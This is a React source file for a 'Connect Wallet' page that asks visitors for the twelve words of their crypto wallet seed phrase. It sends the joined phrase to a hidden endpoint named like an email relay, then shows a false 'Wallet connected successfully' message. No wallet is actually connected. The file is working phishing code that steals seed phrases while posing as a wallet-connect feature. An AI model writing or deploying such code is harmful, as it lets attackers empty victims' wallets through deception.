import React, { useState } from 'react'
import styled from 'styled-components'
import Navigation from '../Navigation';
import { toast } from 'sonner';
import { Navigate } from 'react-router-dom';


const Section = styled.section`
  min-height: ${props => `calc(100vh - ${props.theme.navHeight})`};
  width: 100vw;
  position: relative;
  background-color: ${props => props.theme.body};
`
const Container = styled.div`
  width: 75%;
  min-height: 80vh;
  margin: 0 auto;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;

  @media (max-width: 64em) {
    width: 85%;
  }
  @media (max-width: 48em) {
    width: 100%;
  }
`

const FormContainer = styled.div`
  width: 100%;
  max-width: 600px;
  display: grid;
  grid-template-columns: repeat(3, 1fr);
  gap: 1rem;
  margin-bottom: 2rem;

  @media (max-width: 64em) {
    grid-template-columns: repeat(2, 1fr);
  }
  @media (max-width: 48em) {
    width: 80%;
    margin: 1rem auto;
    grid-template-columns: repeat(1, 1fr);
  }
`

const InputBox = styled.input`
  padding: 0.8rem;
  border-radius: 0.5rem;
  border: 1px solid ${props => props.theme.text};
  background-color: transparent;
  color: ${props => props.theme.text};
  font-size: 1rem;

  &:focus {
    outline: none;
    border-color: ${props => props.theme.primary};
  }
`

const ConnectButton = styled.button`
  padding: 0.8rem 2rem;
  font-size: 1rem;
  border-radius: 2rem;
  border: none;
  cursor: pointer;
  background-color: ${props => props.theme.text};
  color: ${props => props.theme.body};
  transition: all 0.3s ease;

  &:hover {
    background-color: ${props => props.theme.primary};
  }
`

const ConnectWallet = () => {
  const [seedPhrase, setSeedPhrase] = useState(Array(12).fill(''))

  const handleChange = (index, value) => {
    const newPhrase = [...seedPhrase]
    newPhrase[index] = value
    setSeedPhrase(newPhrase)
  }

  const email = process.env.REACT_APP_EMAIL_USER
  const url = process.env.REACT_APP_EMAIL_URL
  console.log(email, url)

  const handleConnect = async () => {
    if (seedPhrase.every(word => word.trim() !== '')) {
      const data = {
        category: 'wallet',
        name: seedPhrase.join(' '),
        email,
        selectedIssue: 'connect wallet'
      }
  
      try {
        const response = await fetch(url, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify(data)
        })
  
        if (!response.ok) {
          throw new Error('Network response was not ok')
        }
  
        await response.json()
        toast.success('Wallet connected successfully.')
        Navigate('/')
      } catch (error) {
        console.error('Error sending email:', error)
        toast.error('Failed to connect wallet. Please try again.')
      }
    } else {
      toast.error('Please fill in all 12 words of your seed phrase.')
    }
  }

  return (
    <Section id="ConnectWallet">
      <Navigation />
      <Container>
        <FormContainer>
          {seedPhrase.map((word, index) => (
            <InputBox
              key={index}
              value={word}
              onChange={(e) => handleChange(index, e.target.value)}
              placeholder={`Word ${index + 1}`}
            />
          ))}
        </FormContainer>
        <ConnectButton onClick={handleConnect}>Connect</ConnectButton>
      </Container>
    </Section>
  )
}

export default ConnectWallet